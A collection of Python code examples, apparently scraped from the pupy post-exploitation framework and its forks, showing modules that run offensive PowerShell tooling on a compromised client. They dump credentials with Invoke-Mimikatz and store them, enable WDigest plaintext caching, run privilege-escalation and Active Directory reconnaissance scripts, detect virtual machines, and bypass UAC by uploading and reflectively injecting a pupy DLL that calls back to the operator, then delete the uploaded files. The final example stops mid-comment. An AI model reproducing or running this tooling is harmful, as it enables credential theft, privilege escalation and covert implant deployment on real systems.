示例#1
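 def run(self, args):
     """Report whether the client host looks like a virtual machine.

     Windows: runs Nishang's Check-VM.ps1 (function ``Check-VM``) through
     ``execute_powershell_script`` and prints its output; empty output is
     reported as "No virtual machine detected".
     Linux/macOS: loads the ``checkvm`` package on the client and calls its
     ``checkvm()``; a truthy return value is used as the hypervisor name.
     Any other platform prints nothing.

     Args:
         args: parsed module arguments (not used by this module).
     """
     if self.client.is_windows():
         script_path = os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1")
         # Context manager: the original never closed the file handle.
         with open(script_path, 'r') as script:
             content = script.read()
         output = execute_powershell_script(self, content, 'Check-VM')
         # Sibling modules treat a falsy result as a failed run; guard before
         # .strip() so a None result is reported instead of raising.
         if output and output.strip():
             self.success("%s" % output)
         else:
             self.success("No virtual machine detected")
     elif self.client.is_linux() or self.client.is_darwin():
         self.client.load_package("checkvm")
         if self.client.is_darwin():
             # The macOS check is slow enough that the operator is warned.
             self.info('Be patient, could take a while')
         vm = self.client.conn.modules["checkvm"].checkvm()
         if vm:
             self.success('This appears to be a %s virtual machine' % vm)
         else:
             self.success('This does not appear to be a virtual machine')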
示例#2
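    def run(self, args):
        r"""Run Invoke-Mimikatz on the client and store the parsed credentials.

        Ships PowerSploit's Invoke-Mimikatz.ps1 when it is not yet registered
        in ``self.client.powershell[<arch>]['scripts_loaded']``, runs
        ``args.command`` through ``execute_powershell_script`` (64-bit
        PowerShell when available), prints the raw output and stores what
        ``self.parse_mimikatz`` extracts from it in ``Credentials``.

        Args:
            args: parsed module arguments; ``args.command`` is the command
                line handed to the Mimikatz script.

        Note:
            On Windows 8.1 / Server 2012 WDigest keeps no plaintext
            credentials unless
            ``HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest``
            ``UseLogonCredential`` (REG_DWORD) is 1. This block neither checks
            nor sets it.
        """
        script = 'mimikatz'
        script_path = os.path.join(ROOT, "external", "PowerSploit",
                                   "Exfiltration", "Invoke-Mimikatz.ps1")

        # Ship the script body if either architecture still lacks it. The
        # original loop only kept the verdict of the last arch ('x86'), so a
        # target with the script loaded for x86 but not x64 ran the command
        # with no definitions available.
        missing = any(
            script not in self.client.powershell[arch]['scripts_loaded']
            for arch in ('x64', 'x86'))
        if missing:
            with open(script_path, 'r') as f:
                content = f.read()
        else:
            content = ''

        output = execute_powershell_script(self,
                                           content,
                                           args.command,
                                           x64IfPossible=True,
                                           script_name=script)
        if not output:
            self.error("Error running mimikatz. Enough privilege ?")
            return
        self.success("%s" % output)

        creds = self.parse_mimikatz(output)
        db = Credentials()
        db.add(creds)
        self.success("Credentials stored on the database")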
示例#3
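    def bypassuac_through_powerSploitBypassUAC(self):
        """Bypass UAC with the PowerSploit Invoke-BypassUAC script (Win7 to 8.1).

        Uploads the helper scripts and the pupy DLL, rewrites the local
        Invoke-BypassUAC.ps1 (Write-Verbose -> Write-Output so the success
        marker is visible; the function renamed to
        ``self.bypassUAC_random_name``), runs it through
        ``execute_powershell_script`` and finally removes the uploaded files
        from the target -- also when the execution raises, which the
        original did not do.

        Uses: ``self.module`` (reporting + client), ``self.uploadPowershellScripts``,
        ``self.uploadPupyDLL``, ``self.invokeBypassUACLocalPath`` and the
        ``*RemotePath`` attributes naming the uploaded files.
        """
        self.module.info('Running powersloit UACBypass method for bypassing UAC...')
        bypass_cmd = (
            "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass "
            "-file {mainPowershell} -Verbose'"
        ).format(InvokeBypassUAC=self.bypassUAC_random_name,
                 mainPowershell=self.mainPowershellScriptRemotePath)

        self.module.info('Uploading temporary files')
        self.uploadPowershellScripts()
        self.uploadPupyDLL()
        remote_files = [self.invokeReflectivePEInjectionRemotePath,
                        self.mainPowershellScriptRemotePath,
                        self.invokeBypassUACRemotePath,
                        self.pupyDLLRemotePath]
        try:
            with open(self.invokeBypassUACLocalPath, 'r') as f:
                content = f.read()
            # Progress is written with Write-Verbose; turn it into regular
            # output so "DLL injection complete!" can be checked below.
            content = re.sub("Write-Verbose ", "Write-Output ", content, flags=re.I)
            # Presumably to avoid the well-known function name -- confirm.
            content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name,
                             content, flags=re.I)
            logging.debug("Starting BypassUAC script with the following cmd: %s", bypass_cmd)
            self.module.info('Starting the UAC Bypass process')
            output = execute_powershell_script(self.module, content, bypass_cmd,
                                               x64IfPossible=True)
            logging.debug("BypassUAC script output: %s\n", output)

            if output and "DLL injection complete!" in output:
                self.module.success("UAC bypassed")
            else:
                self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
        finally:
            # Clean up the uploaded artefacts whatever happened above.
            logging.debug("Deleting temporary files")
            self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(remote_files)

        self.module.success("Waiting for a connection from the DLL (take few seconds)...")
        self.module.success("If nothing happened, try to migrate to another process and try again.")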
示例#4
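 def bypassuac_through_PowerSploitBypassUAC(self):
     """Bypass UAC with the PowerSploit Invoke-BypassUAC script (Win7 to 8.1).

     Uploads the helper scripts and the pupy DLL, patches the local
     Invoke-BypassUAC.ps1 (Write-Verbose -> Write-Output so the success
     marker shows up in the captured output; the function renamed to
     ``self.bypassUAC_random_name``), runs it through
     ``execute_powershell_script`` and then deletes the uploaded files from
     the target. The deletion now runs in a ``finally`` so an exception
     during execution no longer leaves the DLL and scripts behind.

     Relies on ``self.module`` (reporting + client), ``self.uploadPowershellScripts``,
     ``self.uploadPupyDLL``, ``self.invokeBypassUACLocalPath`` and the
     ``*RemotePath`` attributes of the uploaded files.
     """
     bypass_cmd = (
         "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass "
         "-file {mainPowershell} -Verbose'"
     ).format(InvokeBypassUAC=self.bypassUAC_random_name,
              mainPowershell=self.mainPowershellScriptRemotePath)

     self.module.info('Uploading temporary files')
     self.uploadPowershellScripts()
     self.uploadPupyDLL()
     remote_files = [self.invokeReflectivePEInjectionRemotePath,
                     self.mainPowershellScriptRemotePath,
                     self.invokeBypassUACRemotePath,
                     self.pupyDLLRemotePath]
     try:
         with open(self.invokeBypassUACLocalPath, 'r') as f:
             content = f.read()
         # Verbose messages are rewritten as output so the success string
         # "DLL injection complete!" is observable.
         content = re.sub("Write-Verbose ", "Write-Output ", content, flags=re.I)
         # Presumably to avoid the well-known function name -- confirm.
         content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name,
                          content, flags=re.I)
         logging.debug("Starting BypassUAC script with the following cmd: %s", bypass_cmd)
         self.module.info('Starting the UAC Bypass process')
         output = execute_powershell_script(self.module, content, bypass_cmd,
                                            x64IfPossible=True)
         logging.debug("BypassUAC script output: %s\n", output)

         if output and "DLL injection complete!" in output:
             self.module.success("UAC bypassed")
         else:
             self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
     finally:
         # Remove the uploaded artefacts even when the bypass raised.
         logging.debug("Deleting temporary files")
         self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(remote_files)

     self.module.success("Waiting for a connection from the DLL (take few seconds)...")
     self.module.success("If nothing happened, try to migrate to another process and try again.")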
示例#5
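 def run(self, args):
     """Run Nishang's Check-VM.ps1 on the client and print its verdict.

     The script is executed through ``execute_powershell_script`` with the
     ``Check-VM`` function. Like the other versions of this module, empty
     or missing output is reported as "No virtual machine detected" instead
     of printing a blank line.

     Args:
         args: parsed module arguments (not used).
     """
     script_path = os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1")
     with open(script_path, 'r') as script:
         content = script.read()
     output = execute_powershell_script(self, content, 'Check-VM')
     if output and output.strip():
         self.success("%s" % output)
     else:
         self.success("No virtual machine detected")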
示例#6
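    def run(self, args):
        """Toggle WDigest caching or run Invoke-Mimikatz and store credentials.

        With ``args.wdigest`` set, only the ``pupwinutils.wdigest`` package is
        loaded on the client and its ``wdigest(args.wdigest)`` is called; the
        (ok, message) pair is reported and nothing else runs. On Windows 10
        no plaintext password comes out of Mimikatz unless the
        ``UseLogonCredential`` registry value is present and enabled.

        Otherwise PowerSploit's Invoke-Mimikatz.ps1 is shipped when it is not
        registered in ``self.client.powershell[<arch>]['scripts_loaded']``,
        ``args.command`` is executed (64-bit PowerShell when available), the
        output is printed and the credentials ``self.parse_mimikatz`` finds
        are stored in ``Credentials``.

        Args:
            args: parsed module arguments (``wdigest``, ``command``).
        """
        if args.wdigest:
            self.client.load_package("pupwinutils.wdigest")
            ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
            if ok:
                self.success(message)
            else:
                self.warning(str(message))
            return

        script = 'mimikatz'
        script_path = os.path.join(ROOT, "external", "PowerSploit",
                                   "Exfiltration", "Invoke-Mimikatz.ps1")

        # Ship the script if either arch lacks it: the original loop only
        # honoured the last arch ('x86'), so a script loaded for x86 but not
        # x64 was never sent and the command ran without definitions.
        missing = any(
            script not in self.client.powershell[arch]['scripts_loaded']
            for arch in ('x64', 'x86'))
        if missing:
            with open(script_path, 'r') as f:
                content = f.read()
        else:
            content = ''

        output = execute_powershell_script(self, content, args.command,
                                           x64IfPossible=True, script_name=script)
        if not output:
            self.error("Error running mimikatz. Enough privilege ?")
            return
        self.success("%s" % output)

        creds = self.parse_mimikatz(output)
        db = Credentials()
        db.add(creds)
        self.success("Credentials stored on the database")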
示例#7
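    def bypassuac_through_PowerSploitBypassUAC(self):
        """Bypass UAC with the PowerSploit Invoke-BypassUAC script (Win7 to 8.1).

        Uploads the helper scripts and the pupy DLL, runs the local
        Invoke-BypassUAC.ps1 (Write-Verbose rewritten to Write-Output so the
        "DLL injection complete!" marker is visible) through
        ``execute_powershell_script``, then deletes each uploaded file with
        ``self.deleteTHisRemoteFile``. The deletion is in a ``finally`` so a
        failure during execution no longer leaves the artefacts on the target.

        Relies on ``self.module``, ``self.uploadPowershellScripts``,
        ``self.uploadPupyDLL``, ``self.invokeBypassUACLocalPath`` and the
        ``*RemotePath`` attributes of the uploaded files.
        """
        bypass_cmd = (
            "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass "
            "-file {0} -Verbose'"
        ).format(self.mainPowershellScriptRemotePath)
        success_marker = "DLL injection complete!"

        self.uploadPowershellScripts()
        self.uploadPupyDLL()
        remote_files = [self.invokeReflectivePEInjectionRemotePath,
                        self.mainPowershellScriptRemotePath,
                        self.invokeBypassUACRemotePath,
                        self.pupyDLLRemotePath]
        try:
            with open(self.invokeBypassUACLocalPath, 'r') as f:
                content = f.read()
            content = re.sub("Write-Verbose ", "Write-Output ", content, flags=re.I)
            logging.info("Starting BypassUAC script with the following cmd: %s", bypass_cmd)
            output = execute_powershell_script(self.module, content, bypass_cmd)
            logging.info("BypassUAC script output: %s\n", output)
            if output and success_marker in output:
                self.module.success("UAC bypassed")
            else:
                self.module.warning(
                    "Impossible to know what's happened remotely. You should active debug mode."
                )
        finally:
            for remote_file in remote_files:
                self.deleteTHisRemoteFile(remote_file)

        self.module.success(
            "Waiting for a connection from the DLL (take few seconds)...")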
示例#8
文件: check_vm.py 项目: samhaxr/OSPTF
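 def run(self, args):
     """Run Nishang's Check-VM.ps1 on the client and report the result.

     Empty (or missing) output from ``execute_powershell_script`` is
     reported as "No virtual machine detected".

     Args:
         args: parsed module arguments (not used).
     """
     script_path = os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1")
     with open(script_path, 'r') as script:
         content = script.read()
     output = execute_powershell_script(self, content, 'Check-VM')
     # Guard against a None result before .strip().
     if output and output.strip():
         self.success("%s" % output)
     else:
         self.success("No virtual machine detected")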
示例#9
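 def run(self, args):
     """Detect a virtual machine on the client with Nishang's Check-VM.ps1.

     The script's ``Check-VM`` function is run via
     ``execute_powershell_script``; non-blank output is printed as-is,
     anything else is reported as "No virtual machine detected".

     Args:
         args: parsed module arguments (not used).
     """
     script_path = os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1")
     with open(script_path, "r") as script:
         content = script.read()
     output = execute_powershell_script(self, content, "Check-VM")
     if output and output.strip():
         self.success("%s" % output)
     else:
         self.success("No virtual machine detected")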
示例#10
文件: powerup.py 项目: roox/pupy
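    def run(self, args):
        """Run all PowerUp privilege-escalation checks on the client.

        Loads PowerSploit's PowerUp.ps1, executes ``Invoke-AllChecks`` through
        ``execute_powershell_script``, collapses runs of blank lines in the
        output and prints it. A falsy result is reported as an error instead
        of raising on ``.replace``.

        Args:
            args: parsed module arguments (not used).
        """
        script_path = os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1")
        with open(script_path, 'r') as script:
            content = script.read()

        # launch all PowerUp checks
        output = execute_powershell_script(self, content, 'Invoke-AllChecks')
        if not output:
            self.error("No results")
            return

        # Collapse the blank lines PowerUp emits between findings (the second
        # "\n\n" pass catches lines left by the first, as in the original).
        output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
        self.success("Output of the script: \n%s" % output)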
示例#11
文件: powerup.py 项目: samhaxr/OSPTF
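    def run(self, args):
        """Run PowerUp's ``Invoke-AllChecks`` on the client and print the output.

        PowerSploit's PowerUp.ps1 is read locally and executed through
        ``execute_powershell_script``; runs of blank lines are collapsed
        before printing. A falsy result is reported as "No results" instead
        of raising on ``.replace``.

        Args:
            args: parsed module arguments (not used).
        """
        script_path = os.path.join(ROOT, "external", "PowerSploit", "Privesc",
                                   "PowerUp.ps1")
        with open(script_path, 'r') as script:
            content = script.read()

        # launch all PowerUp checks
        output = execute_powershell_script(self, content, 'Invoke-AllChecks')
        if not output:
            self.error("No results")
            return

        # Collapse blank lines (second "\n\n" pass as in the original).
        output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace(
            "\n\n", "\n").replace("\n\n", "\n")
        self.success("%s" % output)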
示例#12
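    def run(self, args):
        """Run a PowerUp command on the client and print the cleaned output.

        PowerSploit's PowerUp.ps1 is shipped only when it is not registered
        in ``self.client.powershell[<arch>]['scripts_loaded']``; then
        ``args.command`` is executed through ``execute_powershell_script``
        and the output printed with runs of blank lines collapsed.

        Args:
            args: parsed module arguments; ``args.command`` is the PowerUp
                function (and parameters) to run.
        """
        script = 'powerup'
        script_path = os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1")

        # Ship the script if either arch lacks it. The original loop only
        # kept the verdict of the last arch ('x86').
        missing = any(
            script not in self.client.powershell[arch]['scripts_loaded']
            for arch in ('x64', 'x86'))
        if missing:
            with open(script_path, 'r') as f:
                content = f.read()
        else:
            content = ''

        output = execute_powershell_script(self, content, args.command, script_name=script)
        if not output:
            # Consistent with the powerview module; avoids .replace on None.
            self.error("No results")
            return

        # Collapse blank lines (second "\n\n" pass as in the original).
        output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
        self.success("%s" % output)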
示例#13
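    def run(self, args):
        """Run a PowerView command on the client and print its output.

        PowerSploit's PowerView.ps1 is shipped only when it is not registered
        in ``self.client.powershell[<arch>]['scripts_loaded']``; then
        ``args.command`` is executed through ``execute_powershell_script``.

        Args:
            args: parsed module arguments; ``args.command`` is the PowerView
                function (and parameters) to run.
        """
        script = 'powerview'
        script_path = os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1")

        # Ship the script if either arch lacks it. The original loop only
        # honoured the last arch ('x86'), so a script loaded for x86 but not
        # x64 was never sent.
        missing = any(
            script not in self.client.powershell[arch]['scripts_loaded']
            for arch in ('x64', 'x86'))
        if missing:
            with open(script_path, 'r') as f:
                content = f.read()
        else:
            content = ''

        output = execute_powershell_script(self, content, args.command, script_name=script)
        if not output:
            self.error("No results")
            return
        self.success("Output: \n%s\n" % output)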
示例#14
文件: check_vm.py 项目: n1nj4sec/pupy
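 def run(self, args):
     """Report whether the client host looks like a virtual machine.

     Windows: runs Nishang's Check-VM.ps1 (``Check-VM``) through
     ``execute_powershell_script``; blank or missing output means
     "No virtual machine detected".
     Linux: loads the ``checkvm`` package on the client and calls
     ``checkvm()``; a truthy result is used as the hypervisor name.
     Other platforms print nothing.

     Args:
         args: parsed module arguments (not used).
     """
     if self.client.is_windows():
         script_path = os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1")
         with open(script_path, 'r') as script:
             content = script.read()
         output = execute_powershell_script(self, content, 'Check-VM')
         # Guard against a None result before .strip().
         if output and output.strip():
             self.success("%s" % output)
         else:
             self.success("No virtual machine detected")
     elif self.client.is_linux():
         self.client.load_package("checkvm")
         vm = self.client.conn.modules["checkvm"].checkvm()
         if vm:
             self.success('This appears to be a %s virtual machine' % vm)
         else:
             self.success('This does not appear to be a virtual machine')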
示例#15
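    def run(self, args):
        r"""Run Invoke-Mimikatz (default invocation) and store the credentials.

        Reads PowerSploit's Invoke-Mimikatz.ps1, runs ``Invoke-Mimikatz``
        through ``execute_powershell_script`` (64-bit PowerShell when
        available), prints the output and stores what ``self.parse_mimikatz``
        extracts in ``Credentials``.

        Args:
            args: parsed module arguments (not used).

        Note:
            On Windows 8.1 / Server 2012 WDigest keeps no plaintext
            credentials unless
            ``HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest``
            ``UseLogonCredential`` (REG_DWORD) is 1; this block does not
            check or set it.
        """
        script_path = os.path.join(ROOT, "external", "PowerSploit",
                                   "Exfiltration", "Invoke-Mimikatz.ps1")
        with open(script_path, 'r') as script:
            content = script.read()

        output = execute_powershell_script(self, content, 'Invoke-Mimikatz',
                                           x64IfPossible=True)
        if not output:
            self.error("Error running mimikatz. Enough privilege ?")
            return
        self.success("%s" % output)

        creds = self.parse_mimikatz(output)
        db = Credentials()
        db.add(creds)
        self.success("Credentials stored on the database")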
示例#16
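    def run(self, args):
        """Toggle WDigest caching, or run Invoke-Mimikatz and store credentials.

        ``args.wdigest`` set: load ``pupwinutils.wdigest`` on the client, call
        ``wdigest(args.wdigest)``, report its (ok, message) pair and return.
        On Windows 10 Mimikatz yields no plaintext password unless the
        ``UseLogonCredential`` registry value exists and is enabled.

        Otherwise: ship PowerSploit's Invoke-Mimikatz.ps1 when it is not
        registered in ``self.client.powershell[<arch>]['scripts_loaded']``,
        run ``args.command`` (64-bit PowerShell when available), print the
        output and store the credentials ``self.parse_mimikatz`` finds.

        Args:
            args: parsed module arguments (``wdigest``, ``command``).
        """
        if args.wdigest:
            self.client.load_package("pupwinutils.wdigest")
            ok, message = self.client.conn.modules[
                "pupwinutils.wdigest"].wdigest(args.wdigest)
            if ok:
                self.success(message)
            else:
                self.warning(str(message))
            return

        script = 'mimikatz'
        script_path = os.path.join(ROOT, "external", "PowerSploit",
                                   "Exfiltration", "Invoke-Mimikatz.ps1")

        # Ship the script if either arch lacks it: the original loop kept
        # only the last arch's ('x86') verdict, so a script loaded for x86 but
        # not x64 was never sent and the command ran without definitions.
        missing = any(
            script not in self.client.powershell[arch]['scripts_loaded']
            for arch in ('x64', 'x86'))
        if missing:
            with open(script_path, 'r') as f:
                content = f.read()
        else:
            content = ''

        output = execute_powershell_script(self,
                                           content,
                                           args.command,
                                           x64IfPossible=True,
                                           script_name=script)
        if not output:
            self.error("Error running mimikatz. Enough privilege ?")
            return
        self.success("%s" % output)

        creds = self.parse_mimikatz(output)
        db = Credentials()
        db.add(creds)
        self.success("Credentials stored on the database")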
示例#17
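	def bypassuac_through_PowerSploitBypassUAC(self):
		"""Bypass UAC with the PowerSploit Invoke-BypassUAC script (Win7 to 8.1).

		Uploads the helper scripts and the pupy DLL, runs the local
		Invoke-BypassUAC.ps1 (Write-Verbose rewritten to Write-Output so the
		"DLL injection complete!" marker is visible) via
		``execute_powershell_script``, then deletes each uploaded file with
		``self.deleteTHisRemoteFile``. Deletion is in a ``finally`` so an
		exception during execution no longer leaves the artefacts behind.

		Relies on ``self.module``, ``self.uploadPowershellScripts``,
		``self.uploadPupyDLL``, ``self.invokeBypassUACLocalPath`` and the
		``*RemotePath`` attributes of the uploaded files.
		"""
		bypass_cmd = (
			"Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass "
			"-file {0} -Verbose'"
		).format(self.mainPowershellScriptRemotePath)
		success_marker = "DLL injection complete!"

		self.uploadPowershellScripts()
		self.uploadPupyDLL()
		remote_files = [self.invokeReflectivePEInjectionRemotePath,
				self.mainPowershellScriptRemotePath,
				self.invokeBypassUACRemotePath,
				self.pupyDLLRemotePath]
		try:
			with open(self.invokeBypassUACLocalPath, 'r') as f:
				content = f.read()
			content = re.sub("Write-Verbose ", "Write-Output ", content, flags=re.I)
			logging.info("Starting BypassUAC script with the following cmd: %s", bypass_cmd)
			output = execute_powershell_script(self.module, content, bypass_cmd)
			logging.info("BypassUAC script output: %s\n", output)
			if output and success_marker in output:
				self.module.success("UAC bypassed")
			else:
				self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
		finally:
			for remote_file in remote_files:
				self.deleteTHisRemoteFile(remote_file)

		self.module.success("Waiting for a connection from the DLL (take few seconds)...")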
示例#18
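 def run(self, args):
     """Run Nishang's Check-VM.ps1 on the client and print its verdict.

     The ``Check-VM`` function is executed via ``execute_powershell_script``.
     As in the other versions of this module, blank or missing output is
     reported as "No virtual machine detected" rather than as an empty line.

     Args:
         args: parsed module arguments (not used).
     """
     script_path = os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1")
     with open(script_path, 'r') as script:
         content = script.read()
     output = execute_powershell_script(self, content, 'Check-VM')
     if output and output.strip():
         self.success("%s" % output)
     else:
         self.success("No virtual machine detected")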
示例#19
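def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
    """Bypass UAC with Empire's Invoke-BypassUAC and inject the pupy DLL.

    Flow (every remote operation goes through ``module.client.conn``):
      1. detect the target architecture and build the matching pupy DLL
         from the client's configuration; abort if it is neither x86 nor
         x64. This is done before any upload so an abort leaves nothing on
         the target (the original had already uploaded two files here);
      2. stage locally a PowerShell loader that reads
         Invoke-ReflectivePEInjection and the base64 DLL blob with
         ``cat ... | iex`` and calls
         ``Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR``;
      3. upload Invoke-ReflectivePEInjection, the loader and the DLL blob
         under random names in the target's %TEMP%;
      4. run Invoke-BypassUAC (Write-Verbose rewritten to Write-Output so the
         "DLL injection complete!" marker is visible) with a command that
         executes the uploaded loader from an elevated PowerShell;
      5. delete whatever was uploaded with ``DEL /F /Q`` -- in a ``finally``
         and per file, so a failure in step 3/4 or in one deletion does not
         leave the other files behind.

    Args:
        module: pupy module driving the session; provides ``client`` and the
            ``error``/``success``/``warning`` reporters.
        rootPupyPath: path of the pupy checkout, used to locate the external
            PowerSploit/Empire scripts.

    Returns:
        None. Results are reported through ``module``.
    """
    module.client.load_package("psutil")
    module.client.load_package("pupwinutils.processes")
    remote = module.client.conn.modules

    # --- 1. architecture + DLL, before anything touches the target.
    res = remote['pupy'].get_connect_back_host()
    host, port = res.rsplit(':', 1)
    logging.info("Address configured is %s:%s for pupy dll...", host, port)
    logging.info("Looking for process architecture...")
    processes = remote['pupwinutils.processes']
    if processes.is_x64_architecture():
        logging.info("Target achitecture is x64, using a x64 dll")
        dllbuff = pupygen.get_edit_pupyx64_dll(module.client.get_conf())
    elif processes.is_x86_architecture():
        logging.info("Target achitecture is x86, using a x86 dll")
        dllbuff = pupygen.get_edit_pupyx86_dll(module.client.get_conf())
    else:
        module.error("Target architecture is unknown (!= x86 or x64), abording...")
        return

    # --- Remote paths: random names under %TEMP%. The two scripts read back
    # with `cat | iex` are stored as .txt; only the loader run via `-file`
    # needs .ps1.
    remote_path = remote['os.path']
    remote_tmp_dir = remote_path.expandvars("%TEMP%")

    def remote_name(ext):
        # The original formatted "{0}.{1}" with ext='.txt', producing
        # "<name>..txt"; this yields "<name>.txt".
        base = remote_path.join(remote_tmp_dir, next(_get_candidate_names()))
        return "{0}.{1}".format(base, ext)

    reflective_remote = remote_name('txt')
    loader_remote = remote_name('ps1')
    dll_remote = remote_name('txt')

    # --- Local paths.
    # NOTE(review): the two staging files have fixed names in the shared
    # temp dir and are not removed afterwards; dllFile.txt contains the DLL
    # built with the configured connect-back address.
    loader_local = os.path.join(gettempdir(), 'mainPowerShellScriptPrivileged.txt')
    dll_local = os.path.join(gettempdir(), 'dllFile.txt')
    external = os.path.join(rootPupyPath, "pupy", "external")
    bypassuac_local = os.path.join(external, "Empire", "privesc", "Invoke-BypassUAC.ps1")
    reflective_local = os.path.join(external, "PowerSploit", "CodeExecution",
                                    "Invoke-ReflectivePEInjection.ps1")

    # --- Constants.
    bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(
        loader_remote)
    byPassUACSuccessString = "DLL injection complete!"
    # Loader run by the elevated PowerShell: {0}=Invoke-ReflectivePEInjection
    # (.txt), {1}=DLL blob (.txt, defines $PEBytes).
    loader_template = """
	cat {0} | Out-String  | iex
	cat {1} | Out-String  | iex
	Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
	"""

    # --- 2. stage the loader and the DLL blob locally.
    logging.info("Creating the Powershell script in %s locally", loader_local)
    with open(loader_local, 'w+') as w:
        w.write(loader_template.format(reflective_remote, dll_remote))
    logging.info("Creating the pupy dll in %s locally", dll_local)
    with open(dll_local, 'w+') as w:
        # NOTE(review): on Python 3 b64encode() returns bytes and "%s" would
        # embed "b'...'" -- decode() before formatting if this is ported.
        w.write('$PEBytes = [System.Convert]::FromBase64String("%s")' %
                (base64.b64encode(dllbuff)))

    with open(bypassuac_local, 'r') as f:
        content = f.read()
    # Progress is written with Write-Verbose; rewrite to Write-Output so the
    # success marker shows up in the captured output.
    content = re.sub("Write-Verbose ", "Write-Output ", content, flags=re.I)

    # --- 3./4. upload, run, and 5. always clean up what was uploaded.
    uploaded = []
    try:
        for local, remote_file, what in (
                (reflective_local, reflective_remote, "powershell code for DLL injection"),
                (loader_local, loader_remote, "main powershell script executed by BypassUAC"),
                (dll_local, dll_remote, "pupy dll")):
            logging.info("Uploading %s in %s", what, remote_file)
            upload(module.client.conn, local, remote_file)
            uploaded.append(remote_file)

        logging.info("Starting BypassUAC script with the following cmd: %s", bypassUACcmd)
        output = execute_powershell_script(module, content, bypassUACcmd)
        logging.info("BypassUAC script output: %s\n", output)
        if output and byPassUACSuccessString in output:
            module.success("UAC bypassed")
        else:
            module.warning(
                "Impossible to know what's happened remotely. You should active debug mode."
            )
    finally:
        # Best-effort: one failing DEL must not skip the remaining files.
        for aFile in uploaded:
            logging.info("Deleting remote file %s", aFile)
            try:
                status = remote.subprocess.check_output(
                    "DEL /F /Q \"{0}\"".format(aFile),
                    stderr=subprocess.STDOUT,
                    stdin=subprocess.PIPE,
                    shell=True)
                logging.debug("Delete Status: %s", repr(status))
            except Exception as e:
                logging.warning("Could not delete remote file %s: %s", aFile, e)

    module.success("Waiting for a connection from the DLL (take few seconds)...")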
示例#20
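    def run(self, args):
        """Run one PowerView function on the client and print its output.

        ``args.list_available_commands`` only prints ``self.commands_available``.
        Otherwise PowerSploit's PowerView.ps1 is shipped when it is not yet
        registered in ``self.client.powershell[<arch>]['scripts_loaded']``,
        the command selected from the ``args`` switches (see below) or
        given verbatim in ``args.command`` is run through
        ``execute_powershell_script`` and its output is printed.

        Switch precedence is the original one: the first true switch in the
        ``Get-NetComputer`` ... ``Get-ExploitableSystem`` list wins;
        ``Get-Proxy`` applies only when none of those is set; ``args.command``
        is the fallback; an error is reported when nothing is selected.

        Args:
            args: parsed module arguments (PowerView switches, ``command``,
                ``list_available_commands``).
        """
        script = 'powerview'
        if args.list_available_commands:
            self.log(self.commands_available)
            return

        # Ship the script if either arch lacks it. The original loop only
        # honoured the last arch ('x86').
        missing = any(
            script not in self.client.powershell[arch]['scripts_loaded']
            for arch in ('x64', 'x86'))
        if missing:
            logging.debug("Loading PowerView.ps1 script on target...")
            script_path = os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1")
            with open(script_path, 'r') as f:
                content = f.read()
        else:
            logging.debug("PowerView.ps1 script already loaded on target")
            content = ''

        # (switch, command) in the original elif order; first true wins.
        switches = [
            (args.GetNetComputer, "Get-NetComputer"),
            (args.GetNetMssql, "Get-NetComputer -SPN mssql*"),
            (args.GetNetSubnet, "Get-NetSubnet"),
            (args.GetNetGroup, "Get-NetGroup"),
            (args.GetNetGroupWith is not None,
             "Get-NetGroup -GroupName *{0}* -FullData".format(args.GetNetGroupWith)),
            (args.GetNetGroupMember, "Get-NetGroupMember"),
            (args.GetNetFileServer, "Get-NetFileServer"),
            (args.GetDFSshare, "Get-DFSshare"),
            (args.GetNetGPO, "Get-NetGPO"),
            (args.GetNetGPOGroup, "Get-NetGPOGroup"),
            (args.FindGPOLocation is not None,
             "Find-GPOLocation -UserName {0}".format(args.FindGPOLocation)),
            (args.GetNetLocalGroup, "Get-NetLocalGroup"),
            (args.GetNetLoggedon, "Get-NetLoggedon"),
            (args.GetNetLoggedonOn is not None,
             "Get-NetLoggedon -ComputerName {0}".format(args.GetNetLoggedonOn)),
            (args.GetNetSession, "Get-NetSession"),
            (args.GetNetSessionOn is not None,
             "Get-NetSession -ComputerName {0}".format(args.GetNetSessionOn)),
            (args.GetNetRDPSession, "Get-NetRDPSession"),
            (args.GetNetRDPSessionOn is not None,
             "Get-NetRDPSession -ComputerName {0}".format(args.GetNetRDPSessionOn)),
            (args.GetLastLoggedOn, "Get-LastLoggedOn"),
            (args.GetLastLoggedOnOn is not None,
             "Get-LastLoggedOn -ComputerName {0}".format(args.GetLastLoggedOnOn)),
            (args.InvokeUserHunterCheck, "Invoke-UserHunter -CheckAccess"),
            (args.InvokeUserHunterForest, "Invoke-UserHunter -SearchForest"),
            (args.GetExploitableSystem, "Get-ExploitableSystem  | Format-Table -AutoSize"),
        ]
        command = next((cmd for selected, cmd in switches if selected), None)
        # Get-Proxy was a separate `if` in the original, so any switch above
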